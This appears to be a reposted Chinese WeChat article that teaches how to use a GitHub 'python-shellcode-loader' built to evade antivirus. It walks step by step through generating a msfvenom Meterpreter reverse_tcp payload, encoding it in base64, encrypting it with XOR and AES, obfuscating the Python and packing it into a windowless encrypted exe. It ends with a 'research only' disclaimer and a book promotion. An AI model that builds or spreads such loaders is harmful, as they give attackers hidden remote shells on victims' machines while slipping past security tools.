项目作者:HZzz2 项目地址:https://github.com/HZzz2/python-shellcode-loader
://github.com/HZzz2/python-shellcode-loader.gitcd python-shellcode-loaderpip install -r .requirements.txt
2、生成shellcode
#生成shellcodemsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw
3、base64编码shellcode并替换jiami.py中的值
#base64base64 -w 0 -i rev.raw > rev.bs64cat rev.bs64复制base64的值替换jiami.py中payload 也就是 第二十四行 sc='payload'
#加密base64后的shellcodepython3 jiami.py#会生成一个aes-xor.txt的文件,复制文件里的值(经过XOR和AES加密后)复制的值替换main.py中的payload 也就是第四十一行 jiami_sc='payload'
缩小python代码pyminify main.py --output main-mini.py混淆main-mini.py中的python代码https://pyob.oxyry.com/ 在线混淆
#打包成exepyinstaller.exe -Fw -i .setting.ico --key=leslie .main-mini-ob.py-F 打包为单文件 -w 不显示窗口 -i ico图标文件 --key 加密字节码的密钥等待打包完成。。。。打包好后的可执行程序在dist目录中
四、声明:
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。
推荐书籍
加我微信:ivu123ivu,进送书活动群,不定时免费送书
《Node.js Web全栈开发实战》
本书主要介绍了Node.js在Web全栈开发领域的应用实践,分别从Node.js基础语法、模块化、服务器搭建、Express框架等方面由浅入深地进行讲解。在企业级应用开发方面也有着重讲解,例如MongoDB数据库的操作、Ajax异步请求与同源策略、Node.js会话跟踪技术的应用、Node.js爬虫程序的实现等。在企业开发中,Node.js的应用越来越广泛。像Yahoo、Microsoft等公司的很多应用都已经迁移到Node.js了,国内的阿里巴巴、网易、腾讯、新浪、百度等公司的很多线上产品也纷纷改用Node.js开发,并取得了很好的效果。
原文始发于微信公众号(web安全工具库):Python免杀shellcode加载器 -- python-shellcode-loader
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论